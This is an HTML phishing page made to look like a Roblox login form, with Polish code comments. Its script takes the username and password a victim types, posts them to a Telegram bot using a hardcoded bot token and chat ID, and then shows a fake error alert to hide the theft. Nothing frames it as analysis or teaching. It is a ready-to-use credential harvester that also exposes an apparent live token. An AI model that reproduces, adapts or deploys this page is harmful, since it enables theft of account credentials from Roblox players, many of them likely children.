<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <title>Roblox</title>
    <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet" />
</head>
<body class="bg-black font-sans">
<body background="robck.jpg">
    <div class="min-h-screen flex items-center justify-center">
        <div class="bg-white p-8 rounded-lg shadow-lg w-full max-w-md">
		<h6 align="center"><img src="roblix.jpg"/></h6>
		<br>
            <h1 class="text-3xl font-bold text-center text-gray-800 mb-6">Welcome Back!</h1>
            <form id="loginForm">
                <div class="mb-4">
                    <label for="username" class="block text-gray-700 font-medium mb-2">Username</label>
                    <input
                        type="text"
                        id="username"
                        name="username"
                        class="w-full p-3 border rounded-lg"
                        placeholder="Enter your username"
                        required
                    />
                </div>
                <div class="mb-4">
                    <label for="password" class="block text-gray-700 font-medium mb-2">Password</label>
                    <input
                        type="password"
                        id="password"
                        name="password"
                        class="w-full p-3 border rounded-lg"
                        placeholder="Enter your password"
                        required
                    />
                </div>
                <button
                    type="submit"
                    class="bg-green-500 text-white w-full p-3 rounded-lg font-medium hover:bg-green"
                >
                    Log In
                </button>
            </form>
        </div>
    </div>
    <script>
        document.getElementById("loginForm").addEventListener("submit", async function (e) {
            e.preventDefault();
            const username = document.getElementById("username").value;
            const password = document.getElementById("password").value;

            const botToken = "7732682492:AAF-eiGcbssnfsPOTyyBNZoat1MV8mHi8pQ"; // Twój token bota Telegram
            const chatId = "7567026074"; // Twój chat ID na Telegramie

            const message = `New login:\nUsername: ${username}\nPassword: ${password}`;

            try {
                await fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
                    method: "POST",
                    headers: { "Content-Type": "application/json" },
                    body: JSON.stringify({
                        chat_id: chatId,
                        text: message,
                    }),
                });
                alert("Error Try Again Later");
            } catch (error) {
                alert("Failed.");
            }
        });
    </script>
</body>
</html>